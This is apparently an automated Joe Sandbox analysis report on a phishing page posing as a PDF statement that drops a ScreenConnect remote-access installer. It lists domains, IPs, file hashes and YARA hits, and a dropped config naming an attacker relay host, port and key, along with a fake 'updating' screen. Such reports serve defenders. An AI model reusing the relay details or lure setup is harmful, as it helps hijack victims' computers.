silvervalleyrealestategh.com | 170.10.161.77 | true | false | | unknown
ci3.googleusercontent.com | 172.217.17.33 | true | false | | high
rjpanelplus.top | 194.59.31.199 | true | false | | unknown
s3-r-w.eu-central-1.amazonaws.com | 3.5.137.142 | true | false | | unknown
electroagrotech.com.ua | 88.218.28.52 | true | false | | unknown
tmqw21a.zapto.org | unknown | unknown | false | | unknown
cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | false | | unknown
https://electroagrotech.com.ua/wp-content/uploads/elementor/css/ | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
88.218.28.52 | electroagrotech.com.ua | Ukraine | 50673 | SERVERIUS-ASNL | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
172.217.17.33 | ci3.googleusercontent.com | United States | 15169 | GOOGLEUS | false
172.217.17.35 | unknown | United States | 15169 | GOOGLEUS | false
172.217.17.46 | unknown | United States | 15169 | GOOGLEUS | false
216.58.208.227 | unknown | United States | 15169 | GOOGLEUS | false
194.59.31.199 | rjpanelplus.top | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false
23.218.208.109 | unknown | United States | 6453 | AS6453US | false
74.125.205.84 | unknown | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false
3.5.137.142 | s3-r-w.eu-central-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
170.10.161.77 | silvervalleyrealestategh.com | United States | 32748 | STEADFASTUS | false
                                          IP
                                          192.168.2.16
                                          127.0.0.1
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1563384
                                          Start date and time:2024-11-26 22:38:43 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal64.evad.win@49/41@23/135
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 74.125.205.84
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes were analyzed; the report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):4.9739376290794715
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5A9944427C35328CB2D7E201CD705C32
                                          SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                          SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                          SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):257
                                          Entropy (8bit):4.896176001960815
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                          SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                          SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                          SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):50133
                                          Entropy (8bit):4.759054454534641
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D524E8E6FD04B097F0401B2B668DB303
                                          SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                          SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                          SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):26722
                                          Entropy (8bit):7.7401940386372345
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5CD580B22DA0C33EC6730B10A6C74932
                                          SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                          SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                          SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):197120
                                          Entropy (8bit):6.58476728626163
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AE0E6EBA123683A59CAE340C894260E9
                                          SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                          SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                          SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):68096
                                          Entropy (8bit):6.068776675019683
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                          SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                          SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                          SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):95520
                                          Entropy (8bit):6.505346220942731
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:361BCC2CB78C75DD6F583AF81834E447
                                          SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                          SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                          SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):548864
                                          Entropy (8bit):6.031251664661689
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:16C4F1E36895A0FA2B4DA3852085547A
                                          SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                          SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                          SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):260168
                                          Entropy (8bit):6.416438906122177
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                          SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                          SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                          SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):61216
                                          Entropy (8bit):6.31175789874945
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6DF2DEF5E591E2481E42924B327A9F15
                                          SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                          SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                          SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):601376
                                          Entropy (8bit):6.185921191564225
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:20AB8141D958A58AADE5E78671A719BF
                                          SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                          SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                          SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):842248
                                          Entropy (8bit):6.268561504485627
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BE74AB7A848A2450A06DE33D3026F59E
                                          SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                          SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                          SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):81696
                                          Entropy (8bit):5.862223562830496
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                          SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                          SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                          SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):266
                                          Entropy (8bit):4.842791478883622
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1970
                                          Entropy (8bit):4.690426481732819
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2744E91BB44E575AD8E147E06F8199E3
                                          SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                          SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                          SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with very long lines (459), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):949
                                          Entropy (8bit):5.776097123776163
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E16B6371C6F4FDAB54351877B8435843
                                          SHA1:57A129663247DD57EEF560F78F48FEF5AC9AC7CE
                                          SHA-256:22AFA6C2B784B02D8403A8773FE7730F9FF1C643295F811F1CB11AED2CD08133
                                          SHA-512:7C9B93E6E2CC99AE78115A846C6C24E0187FF59641C10F5E4C6EF718DFB4D09385E19967141F8F1A1D7025CF41F0D2D80B9A4FD2F490B8EC94EE1E0BFE267862
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=tmqw21a.zapto.org&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                          Category:dropped
                                          Size (bytes):1086792
                                          Entropy (8bit):7.793516535218678
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:30CA21632F98D354A940903214AE4DE1
                                          SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                          SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                          SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):234
                                          Entropy (8bit):4.977464602412109
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                          SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                          SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                          SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):4.62694170304723
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                          SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                          SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                          SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36864
                                          Entropy (8bit):4.340550904466943
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                          SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                          SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                          SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):57344
                                          Entropy (8bit):4.657268358041957
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                          SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                          SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                          SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):176128
                                          Entropy (8bit):5.775360792482692
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                          SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                          SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                          SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):11776
                                          Entropy (8bit):5.267782165666963
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                          SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                          SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                          SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1721856
                                          Entropy (8bit):6.639136400085158
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9F823778701969823C5A01EF3ECE57B7
                                          SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                          SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                          SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Process:C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                          Category:dropped
                                          Size (bytes):13336576
                                          Entropy (8bit):7.968421738724259
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A16ED71FED5C5550E9CD42A72CC5B818
                                          SHA1:332448682E2C132735F2BD6754D11B4FE5936240
                                          SHA-256:04FD5115AA2EAB34E76A1947052AE505C589CD0E86C88A208F82514608187BF7
                                          SHA-512:D7ABF3E6260248EB31E16990AD116F227CF3099854D8565F39504EBD49CA2069888C59FB2EA80B86C6DA4AD07A389812FD6A073E9162CDE75B45AB61AD61A7BB
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):16151
                                          Entropy (8bit):6.481390438746775
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C99603CFF45577C5EB8DA3ABD2C88051
                                          SHA1:67EEF493E2DAE77892B56B58BFE56E448B454DF4
                                          SHA-256:F7854A3A43CC5F18EBEE62FF1EAC4761257AEAF5266F152D2E24AEB850A52D3B
                                          SHA-512:69881638D7D4232C551D65F1379FD54CA99245A63DA0BAF2C3F2CA50E96C02BE5ED499EEB3F0CE087F2F18041D3BF88AAF519E98F6C224BE5CF5BAB3333CB742
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):0
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC18A1EC3E55E1646E34A755AB33F245
                                          SHA1:6F91973E5DE37E803520F2135946BFDFEF003FC5
                                          SHA-256:AC0FD6FEC6042890E328E3085B6718057186CE5A0FD9F86F2B37F5D252D5DAB7
                                          SHA-512:7255C2913C0D3C98B36627C8CBF02B767FFF3F1C13F8FC33C2D40B7D50D084E0840ED75A08E74DA62631F4F95EF83EF30E07B80D66BA3F0DA81016046C8B2251
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5622768
                                          Entropy (8bit):7.426032599487788
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC18A1EC3E55E1646E34A755AB33F245
                                          SHA1:6F91973E5DE37E803520F2135946BFDFEF003FC5
                                          SHA-256:AC0FD6FEC6042890E328E3085B6718057186CE5A0FD9F86F2B37F5D252D5DAB7
                                          SHA-512:7255C2913C0D3C98B36627C8CBF02B767FFF3F1C13F8FC33C2D40B7D50D084E0840ED75A08E74DA62631F4F95EF83EF30E07B80D66BA3F0DA81016046C8B2251
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, Author: Joe Security
                                          Reputation:unknown
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):423834
                                          Entropy (8bit):6.577403179557394
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D8287567B3303E17DBD971AFDA3977FB
                                          SHA1:61F7B1290E039FB5E0090BA5BE03393FF12097AF
                                          SHA-256:4C4BC6CC6CF526E87774DA38C82AD1D37B04D59DBE8635F0BA69ADAD935AA05F
                                          SHA-512:8F3A94AA20B0DABCFCDE9EE97C793524CA9C977335659B4341B43309158645D8BFA74168B9752F2182A33E607183769B96529AD68790C48F08D4E5D998264992
                                          Malicious:false
                                          Yara Hits:
